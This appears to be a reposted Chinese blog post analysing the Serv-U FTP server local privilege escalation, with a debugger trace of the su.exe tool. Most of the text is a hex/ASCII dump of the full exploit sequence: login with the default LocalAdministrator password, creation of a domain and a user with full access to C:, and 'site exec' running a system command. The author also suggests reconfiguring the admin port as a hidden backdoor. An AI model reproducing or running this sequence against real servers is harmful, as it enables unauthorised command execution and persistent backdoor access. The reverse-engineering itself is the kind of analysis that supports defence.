对ServU本地提权原理的分析

来源：互联网发布：windows系统搭建编辑：程序博客网时间：2024/05/17 22:36

以前一开始认为ServU本地提权也是像旧版本的远程攻击一样是使用溢出的，但后来看过php版本和aspx版本的本地提权代码后才发现，原来其实不是溢出，而是使用了ServU的本地管理员登录执行site exec 执行了系统命令的。由于一时找不到php版本的代码（而且似乎上次使用aspx版本的那个试验没有成功），于是稍微跟踪了下现成的su.exe，得到下面的命令，（其实实际上如果在本地telnet上ServU，应该也是可以不使用工具而直接执行命令的，不过ServU默认情况下只监听127.0.0.1的管理端口，所以不能远程telnet--联想：如果把ServU本地管理监听的地址为全部地址，再修改下默认密码，那么就立刻成了一个隐秘的后门程序了！)

分析过程：用OD载入su.exe，下断点bp send（拦截收取包用recv），F9运行，注意内存寄存器的内容就可以了

得到记录如下：（左侧是16进制数据，右侧是ASCII码）注意回车，我执行的是notepad.exe

#=====================开始=========================

004211BC 55 53 45 52 20 4C 6F 63 61 6C 41 64 6D 69 6E 69 USER LocalAdmini
004211CC 73 74 72 61 74 6F 72 0D 0A strator..

0042117C 50 41 53 53 20 23 6C 40 24 61 6B 23 2E 6C 6B 3B PASS #l@$ak#.lk;
0042118C 30 40 50 0D 0A 0@P..

0042115C 53 49 54 45 20 4D 41 49 4E 54 45 4E 41 4E 43 45 SITE MAINTENANCE
0042116C 0D 0A ..

00423A30 2D 53 45 54 44 4F 4D 41 49 4E 0D 0A 2D 44 6F 6D -SETDOMAIN..-Dom
00423A40 61 69 6E 3D 78 6C 7C 30 2E 30 2E 30 2E 30 7C 32 ain=xl|0.0.0.0|2
00423A50 31 32 31 7C 2D 31 7C 31 7C 30 0D 0A 2D 54 5A 4F 121|-1|1|0..-TZO
00423A60 45 6E 61 62 6C 65 3D 30 0D 0A 20 54 5A 4F 4B 65 Enable=0.. TZOKe
00423A70 79 3D 0D 0A y=..

00423AA4 2D 53 45 54 55 53 45 52 53 45 54 55 50 0D 0A 2D -SETUSERSETUP..-
00423AB4 49 50 3D 30 2E 30 2E 30 2E 30 0D 0A 2D 50 6F 72 IP=0.0.0.0..-Por
00423AC4 74 4E 6F 3D 32 31 32 31 0D 0A 2D 55 73 65 72 3D tNo=2121..-User=
00423AD4 78 6C 0D 0A 2D 50 61 73 73 77 6F 72 64 3D 31 31 xl..-Password=11
00423AE4 31 31 31 31 0D 0A 2D 48 6F 6D 65 44 69 72 3D 63 1111..-HomeDir=c
00423AF4 3A 5C 0D 0A 2D 4C 6F 67 69 6E 4D 65 73 46 69 6C :/..-LoginMesFil
00423B04 65 3D 0D 0A 2D 44 69 73 61 62 6C 65 3D 30 0D 0A e=..-Disable=0..
00423B14 2D 52 65 6C 50 61 74 68 73 3D 31 0D 0A 2D 4E 65 -RelPaths=1..-Ne
00423B24 65 64 53 65 63 75 72 65 3D 30 0D 0A 2D 48 69 64 edSecure=0..-Hid
00423B34 65 48 69 64 64 65 6E 3D 30 0D 0A 2D 41 6C 77 61 eHidden=0..-Alwa
00423B44 79 73 41 6C 6C 6F 77 4C 6F 67 69 6E 3D 30 0D 0A ysAllowLogin=0..
00423B54 2D 43 68 61 6E 67 65 50 61 73 73 77 6F 72 64 3D -ChangePassword=
00423B64 30 0D 0A 2D 51 75 6F 74 61 45 6E 61 62 6C 65 3D 0..-QuotaEnable=
00423B74 30 0D 0A 2D 4D 61 78 55 73 65 72 73 4C 6F 67 69 0..-MaxUsersLogi
00423B84 6E 50 65 72 49 50 3D 2D 31 0D 0A 2D 53 70 65 65 nPerIP=-1..-Spee
00423B94 64 4C 69 6D 69 74 55 70 3D 30 0D 0A 2D 53 70 65 dLimitUp=0..-Spe
00423BA4 65 64 4C 69 6D 69 74 44 6F 77 6E 3D 30 0D 0A 2D edLimitDown=0..-
00423BB4 4D 61 78 4E 72 55 73 65 72 73 3D 2D 31 0D 0A 2D MaxNrUsers=-1..-
00423BC4 49 64 6C 65 54 69 6D 65 4F 75 74 3D 36 30 30 0D IdleTimeOut=600.
00423BD4 0A 2D 53 65 73 73 69 6F 6E 54 69 6D 65 4F 75 74 .-SessionTimeOut
00423BE4 3D 2D 31 0D 0A 2D 45 78 70 69 72 65 3D 30 0D 0A =-1..-Expire=0..
00423BF4 2D 52 61 74 69 6F 55 70 3D 31 0D 0A 2D 52 61 74 -RatioUp=1..-Rat
00423C04 69 6F 44 6F 77 6E 3D 31 0D 0A 2D 52 61 74 69 6F ioDown=1..-Ratio
00423C14 73 43 72 65 64 69 74 3D 30 0D 0A 2D 51 75 6F 74 sCredit=0..-Quot
00423C24 61 43 75 72 72 65 6E 74 3D 30 0D 0A 2D 51 75 6F aCurrent=0..-Quo
00423C34 74 61 4D 61 78 69 6D 75 6D 3D 30 0D 0A 2D 4D 61 taMaximum=0..-Ma
00423C44 69 6E 74 65 6E 61 6E 63 65 3D 53 79 73 74 65 6D intenance=System
00423C54 0D 0A 2D 50 61 73 73 77 6F 72 64 54 79 70 65 3D ..-PasswordType=
00423C64 52 65 67 75 6C 61 72 0D 0A 2D 52 61 74 69 6F 73 Regular..-Ratios
00423C74 3D 4E 6F 6E 65 0D 0A 20 41 63 63 65 73 73 3D 63 =None.. Access=c
00423C84 3A 5C 7C 52 57 41 4D 45 4C 43 44 50 0D 0A :/|RWAMELCDP..

004210C0 55 53 45 52 20 78 6C 0D 0A USER xl..

004210B0 50 41 53 53 20 31 31 31 31 31 31 0D 0A PASS 111111..

00424B80 73 69 74 65 20 65 78 65 63 20 6E 6F 74 65 70 61 site exec notepa
00424B90 64 2E 65 78 65 0D 0A d.exe..

00423A78 2D 44 45 4C 45 54 45 44 4F 4D 41 49 4E 0D 0A 2D -DELETEDOMAIN..-
00423A88 49 50 3D 30 2E 30 2E 30 2E 30 0D 0A 20 50 6F 72 IP=0.0.0.0.. Por
00423A98 74 4E 6F 3D 32 31 32 31 0D 0A tNo=2121..

00421078 51 55 49 54 0D 0A 00 QUIT...

#=================================================================